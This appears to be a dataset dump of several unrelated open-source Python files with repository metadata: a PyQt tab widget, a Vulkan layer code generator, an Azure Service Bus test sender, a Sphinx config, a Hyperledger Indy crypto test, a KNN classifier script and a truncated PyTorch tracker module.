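        pass                           # the actual batch work would go here
    finally:
        lock.release()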
| 24.097403
| 99
| 0.637564
|
f11bbd4d2dd7880d773b173d6f74e8fec22c7292
| 42
|
py
|
Python
|
server/__init__.py
|
nghiattr/flask-docker
|
670cbd2a9255962989f10a92c4ba2375fb0aebb1
|
[
"MIT"
] | null | null | null |
server/__init__.py
|
nghiattr/flask-docker
|
670cbd2a9255962989f10a92c4ba2375fb0aebb1
|
[
"MIT"
] | null | null | null |
server/__init__.py
|
nghiattr/flask-docker
|
670cbd2a9255962989f10a92c4ba2375fb0aebb1
|
[
"MIT"
] | 1
|
2021-10-30T01:28:24.000Z
|
2021-10-30T01:28:24.000Z
|
from .app import *
__version__ = '0.1.4'
| 10.5
| 21
| 0.642857
|
6411f564a0fcf85ff6cc953ad0a31dc22a49fcda
| 4,628
|
py
|
Python
|
WiredQT/plugin/Tab/Tab.py
|
chiptrontech/WiredQTv1.0
|
760948bb736867db4e772031b23ed9151e0364b9
|
[
"MIT"
] | 1
|
2021-12-18T09:17:08.000Z
|
2021-12-18T09:17:08.000Z
|
WiredQT/plugin/Tab/Tab.py
|
chiptrontech/WiredQTv1.0
|
760948bb736867db4e772031b23ed9151e0364b9
|
[
"MIT"
] | null | null | null |
WiredQT/plugin/Tab/Tab.py
|
chiptrontech/WiredQTv1.0
|
760948bb736867db4e772031b23ed9151e0364b9
|
[
"MIT"
] | 2
|
2021-12-18T09:15:53.000Z
|
2022-01-19T15:10:14.000Z
|
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtGui import *
from wired_module import *
# Generated By WiredQT for Python: by Rocky Nuarin, 2021 Phils
class Handler(QtWidgets.QWidget,usercontrol):
#WiredEvent def tabchange(self,index)
#WiredProperty 'TabVisible':'True','list':["True","False"]
#WiredProperty 'BackColorTab': '(1,1,1,0)'
def __init__(self, *param):
super(Handler, self).__init__(None)
initUI(self,param,w=1366,h=768,title="WiredQT v1.0",controlbox=True,startpos=(0,30),timeoutdestroy=-1)
self.GTKForms()
self.timer=QtCore.QTimer()
self.timer.timeout.connect(self.loop)
self.timer.start(10)
self.sch=Scheduler(0)
self.sch.Start()
self._text=''
self.showtab=True
self._TabVisible=True
self._BackColor='(1,1,1,0)'
@property
def BackColorTab(self):
return self._BackColor
@BackColorTab.setter
def BackColorTab(self,value):
#import pdb;pdb.set_trace();
if type(value)==str:
value=eval(value)
self._BackColor=value
self.Viewport1.BackColor=self._BackColor
@property
def TabVisible(self):
return TrueFalse(self._TabVisible)
@TabVisible.setter
def TabVisible(self,value):
self._TabVisible=TrueFalse(value)
try:
if self._TabVisible==True:
for i,a in enumerate(self.btn):
a.Visible=True
self.tab[i].Top=30
else:
for i,a in enumerate(self.btn):
a.Visible=False
self.tab[i].Top=0
except:
value=value
def TabLabel(self,index,label):
self.label[index]=label
self.btn[index].Text=label
def arrangetabs(self):
self.tab=[]
self.label=[]
self.btn=[]
#import pdb;pdb.set_trace()
for a in dir(self.caller):
try:
a=eval("self.caller."+a)
if len(str(type(a)))>len("<class \'tab") and str(type(a))[:len("<class \'tab")]=="<class \'tab" and a!=self:
if (a in self.tab)==False:
self.tab.append(a)
self.label.append("Tab "+str(len(self.label)+1))
except:
pass
#import pdb;pdb.set_trace();
#sort by tab.Left#
#array of tab.Left,tab.label
x=[[a.Left,a,b] for a,b in zip(self.tab,self.label)]
#sort by first index
def sortthis(item):
return item[0]
x=sorted(x, key=sortthis)
#return sorted value
self.tab= [a[1] for a in x]
self.label= [a[2] for a in x]
for i,a in enumerate(self.tab):
btn=QPushButton()
btn.setParent(self)
btn=forms(btn)
self.btn.append(btn)
btn.Text=self.label[i]
btn.Width=100
btn.Height=20
btn.Left=i*100
btn.Top=0
btn.Visible=True
#btn.connect("clicked",self.Tab)
btn.obj.clicked.connect(self.Tab)
self.tab[i].Width=self.Width
self.tab[i].Height=self.Height-20
#self.caller.usercontrol.remove(self.tab[i]._usercontrol)
#self.usercontrol.put(self.tab[i]._usercontrol,30,0)
self.tab[i].setParent(None)
self.tab[i].setParent(self)
self.tab[i].Top=30
self.tab[i].Left=0#self.usercontrol.Left
#print(a,self.tab[i])
if i!=0:
self.tab[i].Visible=False
self.setvisible(0)
self.TabVisible=self._TabVisible
def Tab(self,args):
if type(args)==int:
a=args
else:
args=self.sender()
if type(args)==QPushButton:
a=self.label.index(forms(args).Text)
else:
a=args
self.setvisible(a)
if self.caller!=None and 'tabchange' in self.wiredevents:self.wiredevents['tabchange'](a)
pass
def setvisible(self,index):
for i,a in enumerate(self.tab):
a.Visible=False
self.btn[i].ForeColor=(0,0,0,1)
self.tab[index].Visible=True
self.btn[index].ForeColor=(0,0,1,1)
pass
def connect(self,ev,evusr):
self.wiredevents.update({ev:evusr})
def activeXcreated(self,*args):
self.Viewport1.Width=self.Width
self.Viewport1.Height=self.Height
pass
def loop(self):
if self.form_load==False:
self.form_load=True
if self.sch.Event():#timer routine
#code here
if self.timeoutdestroy!=-1:
self.timeoutdestroy-=1
if self.timeoutdestroy==0:
self.unload(None)
self.sch.Start()#restart scheduler
return True #return true so that main_loop can call it again
def createwidget(self,prop,control,parent,event=[]):
createWidget(self,prop,control,parent,event)
def GTKForms(self):
self.createwidget("{'Left': '0', 'Events': [], 'Top': '0', 'Tag': '', 'Enable': 'True', 'Name': 'Viewport1', 'Var': '', 'Width': '240', 'Height': '125', 'Font': '', 'ForeColor': '(0.92,0.59,0.59,0.3)', 'Picture': '', 'BackColor': '(0.92,0.59,0.59,0.3)', 'Text': '', 'Visible': 'True', 'ParentsType': '', 'Help': ''}",'QWidget','usercontrol',"[]")
def Widget(self):
return self
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
w = Handler()
w.show()
sys.exit(app.exec_())
| 28.567901
| 348
| 0.669404
|
dcb3ccff3611cc10ab5a9e7afcd72f5732e77d60
| 9,298
|
py
|
Python
|
scripts/command_counter_generator.py
|
bethau/Vulkan-ValidationLayers
|
e798df982b1b6fdcbc048f1987cba42cb68dfafa
|
[
"Apache-2.0"
] | 3
|
2020-07-04T07:23:40.000Z
|
2021-07-04T00:15:37.000Z
|
scripts/command_counter_generator.py
|
bethau/Vulkan-ValidationLayers
|
e798df982b1b6fdcbc048f1987cba42cb68dfafa
|
[
"Apache-2.0"
] | null | null | null |
scripts/command_counter_generator.py
|
bethau/Vulkan-ValidationLayers
|
e798df982b1b6fdcbc048f1987cba42cb68dfafa
|
[
"Apache-2.0"
] | 5
|
2021-01-24T11:28:26.000Z
|
2021-07-04T00:15:38.000Z
|
#!/usr/bin/python3 -i
#
# Copyright (c) 2015-2020 The Khronos Group Inc.
# Copyright (c) 2015-2020 Valve Corporation
# Copyright (c) 2015-2020 LunarG, Inc.
# Copyright (c) 2019-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Mark Lobodzinski <mark@lunarg.com>
# Author: Lionel Landwerlin <lionel.g.landwerlin@intel.com>
import os,re,sys
import xml.etree.ElementTree as etree
from generator import *
from collections import namedtuple
from common_codegen import *
#
# CommandCounterOutputGeneratorOptions - subclass of GeneratorOptions.
class CommandCounterOutputGeneratorOptions(GeneratorOptions):
def __init__(self,
conventions = None,
filename = None,
directory = '.',
genpath = None,
apiname = None,
profile = None,
versions = '.*',
emitversions = '.*',
defaultExtensions = None,
addExtensions = None,
removeExtensions = None,
emitExtensions = None,
sortProcedure = regSortFeatures,
prefixText = "",
genFuncPointers = True,
apicall = '',
apientry = '',
apientryp = '',
alignFuncParam = 0,
expandEnumerants = True,
lvt_file_type = ''):
GeneratorOptions.__init__(self,
conventions = conventions,
filename = filename,
directory = directory,
genpath = genpath,
apiname = apiname,
profile = profile,
versions = versions,
emitversions = emitversions,
defaultExtensions = defaultExtensions,
addExtensions = addExtensions,
removeExtensions = removeExtensions,
emitExtensions = emitExtensions,
sortProcedure = sortProcedure)
self.prefixText = prefixText
self.genFuncPointers = genFuncPointers
self.prefixText = None
self.apicall = apicall
self.apientry = apientry
self.apientryp = apientryp
self.alignFuncParam = alignFuncParam
self.lvt_file_type = lvt_file_type
#
# CommandCounterOutputGenerator - subclass of OutputGenerator.
# Generates files needed by the layer validation state tracker
class CommandCounterOutputGenerator(OutputGenerator):
"""Generate command counter in VkCommandBuffer based on XML element attributes"""
def __init__(self,
errFile = sys.stderr,
warnFile = sys.stderr,
diagFile = sys.stdout):
OutputGenerator.__init__(self, errFile, warnFile, diagFile)
# Internal state - accumulators for different inner block text
self.dispatch_list = [] # List of entries for dispatch list
#
# Called once at the beginning of each run
def beginFile(self, genOpts):
OutputGenerator.beginFile(self, genOpts)
# Initialize members that require the tree
self.handle_types = GetHandleTypes(self.registry.tree)
self.lvt_file_type = genOpts.lvt_file_type
if genOpts.lvt_file_type == 'function_pointer_header':
write("#pragma once", file=self.outFile)
# User-supplied prefix text, if any (list of strings)
if (genOpts.prefixText):
for s in genOpts.prefixText:
write(s, file=self.outFile)
# File Comment
file_comment = '// *** THIS FILE IS GENERATED - DO NOT EDIT ***\n'
file_comment += '// See command_counter_generator.py for modifications\n'
write(file_comment, file=self.outFile)
# Copyright Notice
copyright = '/*\n'
copyright += ' * Copyright (c) 2015-2020 The Khronos Group Inc.\n'
copyright += ' * Copyright (c) 2015-2020 Valve Corporation\n'
copyright += ' * Copyright (c) 2015-2020 LunarG, Inc.\n'
copyright += ' * Copyright (c) 2019-2020 Intel Corporation\n'
copyright += ' *\n'
copyright += ' * Licensed under the Apache License, Version 2.0 (the "License");\n'
copyright += ' * you may not use this file except in compliance with the License.\n'
copyright += ' * You may obtain a copy of the License at\n'
copyright += ' *\n'
copyright += ' * http://www.apache.org/licenses/LICENSE-2.0\n'
copyright += ' *\n'
copyright += ' * Unless required by applicable law or agreed to in writing, software\n'
copyright += ' * distributed under the License is distributed on an "AS IS" BASIS,\n'
copyright += ' * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n'
copyright += ' * See the License for the specific language governing permissions and\n'
copyright += ' * limitations under the License.\n'
copyright += ' *\n'
copyright += ' * Author: Mark Lobodzinski <mark@lunarg.com>\n'
copyright += ' * Author: Lionel Landwerlin <lionel.g.landwerlin@intel.com>\n'
copyright += ' */\n'
write(copyright, file=self.outFile)
#
# Write completed source code to output file
def endFile(self):
dest_file = ''
dest_file += self.OutputDestFile()
# Remove blank lines at EOF
if dest_file.endswith('\n'):
dest_file = dest_file[:-1]
write(dest_file, file=self.outFile);
# Finish processing in superclass
OutputGenerator.endFile(self)
#
# Processing at beginning of each feature or extension
def beginFeature(self, interface, emit):
OutputGenerator.beginFeature(self, interface, emit)
self.featureExtraProtect = GetFeatureProtect(interface)
#
# Process commands, adding to dispatch list
def genCmd(self, cmdinfo, name, alias):
OutputGenerator.genCmd(self, cmdinfo, name, alias)
# Get first param type
params = cmdinfo.elem.findall('param')
info = self.getTypeNameTuple(params[0])
if name.startswith('vkCmd') and info[0] == 'VkCommandBuffer':
self.dispatch_list.append((self.featureExtraProtect, name, cmdinfo))
#
# Retrieve the type and name for a parameter
def getTypeNameTuple(self, param):
type = ''
name = ''
for elem in param:
if elem.tag == 'type':
type = noneStr(elem.text)
elif elem.tag == 'name':
name = noneStr(elem.text)
return (type, name)
#
    # Create the function pointer source file content and return it as a string
def GenerateFunctionPointerSource(self):
entries = []
entries = self.dispatch_list
table = '#include "chassis.h"\n'
table += '#include "state_tracker.h"\n'
table += '#include "command_counter.h"\n'
table += '\n'
for item in entries:
# Remove 'vk' from proto name
base_name = item[1][2:]
if item[0] is not None:
table += '#ifdef %s\n' % item[0]
params = item[2].elem.findall('param')
paramstext = ', '.join([''.join(param.itertext()) for param in params])
table += 'void CommandCounter::PreCallRecord%s(%s) {\n' % (base_name, paramstext)
table += ' coreChecks->IncrementCommandCount(%s);\n' % params[0].findall('name')[0].text
table += '}\n'
if item[0] is not None:
table += '#endif // %s\n' % item[0]
return table
#
    # Create the function pointer header file content and return it as a string
def GenerateFunctionPointerHeader(self):
entries = []
table = ''
entries = self.dispatch_list
for item in entries:
# Remove 'vk' from proto name
base_name = item[1][2:]
if item[0] is not None:
table += '#ifdef %s\n' % item[0]
params = item[2].elem.findall('param')
paramstext = ', '.join([''.join(param.itertext()) for param in params])
table += 'void PreCallRecord%s(%s);\n' % (base_name, paramstext)
if item[0] is not None:
table += '#endif // %s\n' % item[0]
return table
# Create a helper file and return it as a string
def OutputDestFile(self):
if self.lvt_file_type == 'function_pointer_header':
return self.GenerateFunctionPointerHeader()
elif self.lvt_file_type == 'function_pointer_source':
return self.GenerateFunctionPointerSource()
else:
return 'Bad LVT File Generator Option %s' % self.lvt_file_type
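# A tiny standalone illustration (not part of the generator) of the itertext() trick the
# two Generate* methods above use to rebuild a full C parameter declaration from a
# registry <param> element; the sample XML fragment here is hand-written.
import xml.etree.ElementTree as etree

sample = etree.fromstring(
    "<param><type>VkCommandBuffer</type> <name>commandBuffer</name></param>")
print(''.join(sample.itertext()))   # -> "VkCommandBuffer commandBuffer"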
| 41.695067
| 103
| 0.599054
|
4d3f34b6dd1dc0748d74f7ceb392be66f6e0770c
| 500
|
py
|
Python
|
elf_parser_factory.py
|
manojrupireddy/encutils
|
c931aa84956c57bea42d0c2dec238547d97d450b
|
[
"MIT"
] | null | null | null |
elf_parser_factory.py
|
manojrupireddy/encutils
|
c931aa84956c57bea42d0c2dec238547d97d450b
|
[
"MIT"
] | 3
|
2020-09-14T17:37:21.000Z
|
2020-09-14T18:58:04.000Z
|
elf_parser_factory.py
|
manojrupireddy/encutils
|
c931aa84956c57bea42d0c2dec238547d97d450b
|
[
"MIT"
] | 1
|
2020-09-16T21:25:34.000Z
|
2020-09-16T21:25:34.000Z
|
import shutil
import sys
from objdump_parser import ObjDumpParser
from llvm_objdump_parser import LLVMObjDumpParser
def get_elf_parser(binary_file_name, show_symbol_files):
if shutil.which("llvm-objdump") is not None:
return LLVMObjDumpParser(binary_file_name, show_symbol_files)
else:
if sys.platform == "Win32":
return None
elif "linux" in sys.platform:
return ObjDumpParser(binary_file_name, show_symbol_files)
return None
| 31.25
| 73
| 0.718
|
21c6117584bf39b0b538ffa122d29c6cb09d5192
| 1,564
|
py
|
Python
|
mottak-arkiv-service/tests/tools/azure_servicebus/send_message.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | null | null | null |
mottak-arkiv-service/tests/tools/azure_servicebus/send_message.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | null | null | null |
mottak-arkiv-service/tests/tools/azure_servicebus/send_message.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | null | null | null |
import logging
import os
import sys
import json
from dotenv import load_dotenv
from azure.servicebus import ServiceBusClient, ServiceBusMessage
load_dotenv()
# Sets up logging
logging.basicConfig(level=logging.INFO, format='%(name)s | %(levelname)s | %(message)s')
logging.getLogger('uamqp').setLevel(logging.WARNING)
logger = logging.getLogger(__name__)
if __name__ == '__main__':
queue_name = os.getenv('TEST_SENDER_QUEUE_NAME')
if not queue_name:
sys.exit('Environment variable TEST_SENDER_QUEUE_NAME is not set.')
connection_string = os.getenv('AZURE_SERVICE_BUS_SENDER_CONNECTION_STRING')
if not connection_string:
sys.exit('Environment variable AZURE_SERVICE_BUS_SENDER_CONNECTION_STRING is not set.')
message = json.dumps({
"arkivkopi_id": 69,
"status": "OK"
})
# message = json.dumps({
# "arkivkopi_id": 10,
# "depotinstitusjon": "arkivverket",
# "storage_account": "arkivverket",
# "source_bucket": "47a35d94-b6b4-4868-9d4a-bfba7f676fce",
# "source_prefix": "b26616cd-fb9d-4840-984c-48bc9d22538d",
# "sas_token": ""
# })
messages = []
for i in range(0, 1):
messages.append(ServiceBusMessage(message))
with ServiceBusClient.from_connection_string(conn_str=connection_string) as queue_client:
with queue_client.get_queue_sender(queue_name=queue_name) as sender:
logger.info(f"Sending {len(messages)} message(s) to the service bus {queue_name} queue")
sender.send_messages(messages)
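# A hedged receiver-side counterpart (not in this file): drain and complete messages from
# the same queue. Assumes a connection string that also has Listen rights; the parameter
# names mirror the variables defined above.
def receive_messages(connection_string, queue_name):
    with ServiceBusClient.from_connection_string(conn_str=connection_string) as client:
        with client.get_queue_receiver(queue_name=queue_name) as receiver:
            for received in receiver.receive_messages(max_message_count=10, max_wait_time=5):
                logger.info(f"Received: {str(received)}")
                receiver.complete_message(received)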
| 31.918367
| 100
| 0.698849
|
7e76997dc38057dbb1aa13424f82aedba7e9c417
| 7,807
|
py
|
Python
|
docs/conf.py
|
shun-liang/whosaidwhat
|
66a593abf74f414d05481514887d4cd84cf99d78
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
shun-liang/whosaidwhat
|
66a593abf74f414d05481514887d4cd84cf99d78
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
shun-liang/whosaidwhat
|
66a593abf74f414d05481514887d4cd84cf99d78
|
[
"MIT"
] | null | null | null |
# whosaidwhat documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'whosaidwhat'
copyright = """2017, Shun Liang"""
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'whosaidwhatdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'whosaidwhat.tex',
'whosaidwhat Documentation',
"""Shun Liang""", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'whosaidwhat', 'whosaidwhat Documentation',
["""Shun Liang"""], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'whosaidwhat', 'whosaidwhat Documentation',
"""Shun Liang""", 'whosaidwhat',
"""A short description of the project.""", 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
| 31.995902
| 80
| 0.706289
|
a2326de2ae8316f73563e682730ce88d58bac3a8
| 1,924
|
py
|
Python
|
test_scripts/functional_tests/crypto/crypto_box_seal_open_fails_with_invalid_wallet_handle_test.py
|
hyperledger/indy-post-install-automation
|
a19cb3c66f0adea6bb4c1fc20e1509cc97bd3d5f
|
[
"Apache-2.0"
] | 2
|
2021-08-23T15:20:22.000Z
|
2021-12-03T01:58:02.000Z
|
test_scripts/functional_tests/crypto/crypto_box_seal_open_fails_with_invalid_wallet_handle_test.py
|
hyperledger-archives/indy-post-install-automation
|
a19cb3c66f0adea6bb4c1fc20e1509cc97bd3d5f
|
[
"Apache-2.0"
] | 1
|
2018-02-22T10:04:41.000Z
|
2018-02-22T10:04:41.000Z
|
test_scripts/functional_tests/crypto/crypto_box_seal_open_fails_with_invalid_wallet_handle_test.py
|
hyperledger/indy-post-install-automation
|
a19cb3c66f0adea6bb4c1fc20e1509cc97bd3d5f
|
[
"Apache-2.0"
] | 7
|
2018-01-03T20:45:48.000Z
|
2019-08-12T11:02:31.000Z
|
"""
Created on Jan 2, 2018
@author: nhan.nguyen
Verify that a user cannot decrypt an anonymously encrypted
message with an invalid wallet handle.
"""
import pytest
from indy import crypto
from indy.error import ErrorCode
from utilities import common, utils
from test_scripts.functional_tests.crypto.crypto_test_base \
import CryptoTestBase
class TestCryptoBoxSealOpenWithInvalidWalletHandle(CryptoTestBase):
@pytest.mark.asyncio
async def test(self):
# 1. Create wallet.
# 2. Open wallet.
self.wallet_handle = await common.create_and_open_wallet_for_steps(
self.steps, self.wallet_name, self.pool_name, credentials=self.wallet_credentials)
# 3. Create verkey.
self.steps.add_step("Create verkey")
my_verkey = await utils.perform(self.steps, crypto.create_key,
self.wallet_handle, "{}")
# 4. Create sealed crypto box.
self.steps.add_step("Create sealed crypto box")
msg = "Test crypto".encode()
encrypted_msg = await utils.perform(self.steps,
crypto.anon_crypt,
my_verkey, msg)
# 5. Open sealed crypto box with invalid wallet handle
# and verify that sealed crypto box cannot be opened.
self.steps.add_step("Open sealed crypto box with "
"invalid wallet handle and verify "
"that sealed crypto box cannot be opened")
error_code = ErrorCode.WalletInvalidHandle
await utils.perform_with_expected_code(self.steps,
crypto.anon_decrypt,
self.wallet_handle + 1,
my_verkey, encrypted_msg,
expected_code=error_code)
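# Hedged companion sketch (not part of the original test): the positive round
# trip that this negative test inverts, using only the indy-sdk calls already
# imported above. A valid `wallet_handle` is assumed to come from the same
# common.create_and_open_wallet_for_steps helper used in the test.
async def anon_crypt_round_trip(wallet_handle):
    verkey = await crypto.create_key(wallet_handle, "{}")
    encrypted = await crypto.anon_crypt(verkey, "Test crypto".encode())
    decrypted = await crypto.anon_decrypt(wallet_handle, verkey, encrypted)
    assert decrypted == "Test crypto".encode()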
| 39.265306
| 94
| 0.587318
|
3a54d6d79f3278f05ce6262dc0c69aa1ac54c326
| 1,584
|
py
|
Python
|
machiane_learning_python/classification/lab03_knn_calulation_dataset.py
|
justin-changqi/machine_learning_practise
|
52e4f6694e9e8ba3dfb57e2f3352641526c3e7d9
|
[
"MIT"
] | null | null | null |
machiane_learning_python/classification/lab03_knn_calulation_dataset.py
|
justin-changqi/machine_learning_practise
|
52e4f6694e9e8ba3dfb57e2f3352641526c3e7d9
|
[
"MIT"
] | null | null | null |
machiane_learning_python/classification/lab03_knn_calulation_dataset.py
|
justin-changqi/machine_learning_practise
|
52e4f6694e9e8ba3dfb57e2f3352641526c3e7d9
|
[
"MIT"
] | null | null | null |
# https://www.youtube.com/watch?v=3XPhmnf96s0&index=18&list=PLQVvvaa0QuDfKTOs3Keq_kaG2P55YRn5v
import numpy as np
from math import sqrt
import warnings
from collections import Counter
import pandas as pd
import random
def k_nearest_neighbors(data, predict, k=3):
if len(data) >= k:
        warnings.warn('K is set to a value less than total voting groups!')
distances = []
for group in data:
for features in data[group]:
euclidean_distance = np.linalg.norm(np.array(features)-np.array(predict))
distances.append([euclidean_distance, group])
    votes = [i[1] for i in sorted(distances)[:k]]
vote_result = Counter(votes).most_common(1)[0][0]
return vote_result
# result = k_nearest_neighbors(dataset, new_features, k=3)
df = pd.read_csv('breast-cancer-wisconsin.data.txt')
df.replace('?', -99999, inplace=True)
# drop useless data
df.drop(['id'], axis=1, inplace=True)
full_data = df.astype(float).values.tolist()
random.shuffle(full_data)
test_size = 0.2
train_set = {2:[], 4:[]}
test_set = {2:[], 4:[]}
train_data = full_data[:-int(test_size*len(full_data))]
test_data = full_data[-int(test_size*len(full_data)):]
for i in train_data:
train_set[i[-1]].append(i[:-1])
for i in test_data:
test_set[i[-1]].append(i[:-1])
correct = 0
total = 0
for group in test_set:
for data in test_set[group]:
vote = k_nearest_neighbors(train_set, data, k=5)
if group == vote:
correct += 1
total += 1
print('Accuracy', correct/total)
# X = np.array(df.drop(['class'], 1))
# y = np.array(df['class'])
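# Hedged usage sketch (not part of the original script): k_nearest_neighbors
# expects a dict mapping each class label to a list of feature vectors, plus a
# single feature vector to classify. The toy numbers below are made up.
toy_train = {2: [[1, 2], [2, 3], [3, 1]], 4: [[6, 5], [7, 7], [8, 6]]}
print('Toy prediction:', k_nearest_neighbors(toy_train, [5, 7], k=3))  # -> 4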
| 31.058824
| 94
| 0.673611
|
251c4524d117d4071525259a0990408b23598afa
| 1,597
|
py
|
Python
|
parser_model/trackers.py
|
NLP-Discourse-SoochowU/rst_dp2019Bottom2Up
|
ac1624127c9c8a3301685193ac8239357e01f6ca
|
[
"MIT"
] | 1
|
2020-08-18T01:28:07.000Z
|
2020-08-18T01:28:07.000Z
|
parser_model/trackers.py
|
NLP-Discourse-SoochowU/rst_dp2019
|
ac1624127c9c8a3301685193ac8239357e01f6ca
|
[
"MIT"
] | null | null | null |
parser_model/trackers.py
|
NLP-Discourse-SoochowU/rst_dp2019
|
ac1624127c9c8a3301685193ac8239357e01f6ca
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
@Author: lyzhang
@Date:
@Description:
"""
import torch
import torch.nn as nn
from config import SEED, Tracking_With_GRU
from utils.file_util import load_data
from config import ALL_LABELS_NUM, Action2ids_path, LABEL_EMBED_SIZE
class Tracker(nn.Module):
""" Desc: tracker for tree lstm
"""
def __init__(self, hidden_size):
nn.Module.__init__(self)
torch.manual_seed(SEED)
self.hidden_size = hidden_size
input_size = 3 * self.hidden_size
self.rnn = nn.LSTMCell(input_size, hidden_size)
self.gru = nn.GRUCell(input_size, hidden_size)
self.label_emb = nn.Embedding(ALL_LABELS_NUM, LABEL_EMBED_SIZE)
self.label_emb.requires_grad = True
self.init_label = nn.Parameter(torch.randn(LABEL_EMBED_SIZE))
self.unk_label = nn.Parameter(torch.randn(LABEL_EMBED_SIZE))
self.label2ids = load_data(Action2ids_path)
def forward(self, stack, buffer_, state, label=None):
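        # Added descriptive comments (not original): shapes inferred from the
        # code below and from __init__ above. Each element of `stack` and
        # `buffer_` is a 1-D tensor of size 2 * hidden_size, whose chunk(2)
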